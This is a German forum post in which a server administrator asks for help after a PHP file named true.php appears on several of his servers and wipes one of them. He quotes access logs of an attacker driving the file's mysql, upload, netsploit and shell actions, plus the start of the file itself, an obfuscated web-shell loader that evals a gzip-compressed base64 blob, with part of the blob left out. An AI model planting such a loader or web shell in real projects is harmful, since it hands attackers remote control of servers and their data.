Hallo Miteinander,

wir haben ein akutes Problem an den Backen...

Auf unserem Server befindet sich plötzlich eine Datei namens true.php über die anscheinend ungewünschte Aktionen ausgeführt werden.
Wie die dahin kommt, keine Ahnung...

Hat jemand ebenfalls damit schon zutun gehabt?

Diese Datei taucht plötzlich sogar auf verschiedenen Servern von uns auf.
Auf einem Server wurden sogar alle Dateien von allen Projekten gelöscht.

Das dies auch mit der true.php-Datei zu tun hat, kann ich nur noch anhand der Log-Datei sehen....

Beispiel aus der Log-Datei:

Die &&& habe ich eingefügt, damit keine Internas im Netz stehen...

85.25.6.85 - - [03/Apr/2012:17:31:09 +0200] "GET /true.php?y=/var/www/web&&&/html/&x=mysql HTTP/1.1" 200 1515 "http://www.&&&&&&.de/true.php" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.229 Version/11.61"  
85\.25.6.85 - - [03/Apr/2012:17:31:10 +0200] "GET /true.php?y=/var/www/web&&&/html/&x=phpinfo HTTP/1.1" 200 9381 "http://www.&&&&&&&&&.de/true.php?y=/var/www/web&&&/html/&x=mysql" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.229 Version/11.61"  
85\.25.6.85 - - [03/Apr/2012:17:31:14 +0200] "GET /true.php?y=/var/www/web&&&/html/&x=netsploit HTTP/1.1" 200 1775 "http://www.&&&&&&&&&.de/true.php?y=/var/www/web&&&/html/&x=phpinfo" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.229 Version/11.61"  
85\.25.6.85 - - [03/Apr/2012:17:31:16 +0200] "GET /true.php?y=/var/www/web&&&/html/&x=upload HTTP/1.1" 200 1684 "http://www.&&&&&&&&&.de/true.php?y=/var/www/web&&&/html/&x=netsploit" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.229 Version/11.61"  
85\.25.6.85 - - [03/Apr/2012:17:31:19 +0200] "GET /true.php?y=/var/www/web&&&/html/&x=shell HTTP/1.1" 200 1434 "http://www.&&&&&&&&&.de/true.php?y=/var/www/web&&&/html/&x=upload" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.229 Version/11.61"  
85\.25.6.85 - - [03/Apr/2012:17:31:21 +0200] "GET /true.php?y=/var/www/web&&&/html/&x=php HTTP/1.1" 200 1414 "http://www.&&&&&&&&&.de/true.php?y=/var/www/web&&&/html/&x=shell" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.229 Version/11.61"  
85\.25.6.85 - - [03/Apr/2012:17:31:23 +0200] "POST /true.php?y=/var/www/web&&&/html/&x=php

Die letzte Aktion war diese:

  
85\.25.6.85 - - [03/Apr/2012:17:33:57 +0200] "POST /true.php?y=/var/&x=shell HTTP/1.1" 200 1405 "http://www.&&&&&&&&&.de/true.php?y=/var/&x=shell" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.10.229 Version/11.61"

Danach erscheint nur noch 404, d.h. keine Dateien werden mehr gefunden, alle Ordner auf dem Server sind leer...

Der Code der true.php sieht folgendermaßen aus:

<?php  
  
// O_O  
// no malware on this code, you can check it by yourself ;-)  
  
@error_reporting(0);  
@set_time_limit(0);  
  
$code = "7T37W+O2sr/f77v/g+vDKaGEPHmFQLpJSCC8AklIgN1+HMd2YhO/sJ3n3v7vVyPJtuw4Abbb9pzT  
0i7Y0mhGGs2MXqPx//6POkiojiO7iY3ns1rn86akbf6yxf34I8cmcD+ccDy/tfWV2xiomsydcExm  
kSQuUOoneHgeyu6zaBqubLhOAudtFTlFFiTZTvBVkrHjzi35iBMsS1NFwVVNI22KruzuOK4tCzof  
U0KTjaGrHHF8CsGgF4J6sRUDKqmOZToqoEU0XFcQFR2lFzkoYQi6fPKF51N9wcEvtI4p/gtfBMKy  
qJi0TehlpqJyv3Ky5sjLvBouVGuJXyRxDc8IAMO34UI2RFOSEysZGNPIDnCQZeBsBxB/Mf4c5qWG  
i3X8i/JO1YeIcYg7n8z+s6jJgpFARTckxA1dGKpi3zR1D3aOIIFbAQ9xaZSkGpD4CTFMRaVkR12g  
CkmpjQHAyzMXZcozSwPWbgySfIoP0uHPZ9EcG6hK6HFrJ4sQfooXUz4FlD7zuqrLPNQlgEPckXeg  
s2xTO+KscR91B89C1GaWassOIJEEV07wNp/UR6i+ciKThP+y6L9cJp/Z2lqDWBdmO6iBJ3wqsZ/5  
  
.....  
  
fEMyWK946wo6C3ZkBB2eZ4Pt4OHgNZhmRyCqfKka5HkzcO6dO40BX3xGVPBLZJ8RreT49WHyvNia  
v5OsNW4/3Nuqtb6bEwm0zJGNSWKzVbtudmrP5dPTFhjqn7lVOUdcgs/mDlIZ9F+Wh431VSL6Larh  
2ft3Sud3FMz1K9zfQzBjxZAOwH6rqcGLWxX+u8nn77Nn8pHNkhIajj5eBdYzNLYKdCrn0eaCShT9  
GYeXVkz5dfQW5tzfWyp/ypZKMN36LnsqS5r0b7KrgkMff0MYXRI5+Xc5ugSRMg1t/rFIup/wlDIU  
P9ebKb5xxBlqJHYRwDz9ngeey0YidNr58ZPNFZF4Yw8333uEyS2H2SVOSRHR8RKZeAfhc3sPIFic  
Bl8fjZPNQSyZwTKdT7YO3hw2XZmEwZKnjVat2mm2Hp/btdtyq4wet1bS1EcIU4QiTWPaRU/ryKfj  
Q0BwfX1EXEu8T4h6HtIrnE7YaOlULonWEpdnCEoPn9fh/h8=";  
  
@eval(gzinflate(base64_decode($code)));  
  
?>

Der ganze Code beträgt ca. 190 Zeilen.
Ich kann ihn hier nicht posten, da mir geschwätzigkeit unterstellt wird ;)

so wie ich das sehe, wurde auch die htaccess ausgetauscht.

Den Code dieser htaccess kann ich gerne auch hier Posten.
Vorerst aber erstmal soweit diese Infos, sonst wird der Post zu lange...

Über Hilfe würde ich mich freuen.
Bin gerade ein bisschen überfordert mit dem was hier los ist.

Gruß Ron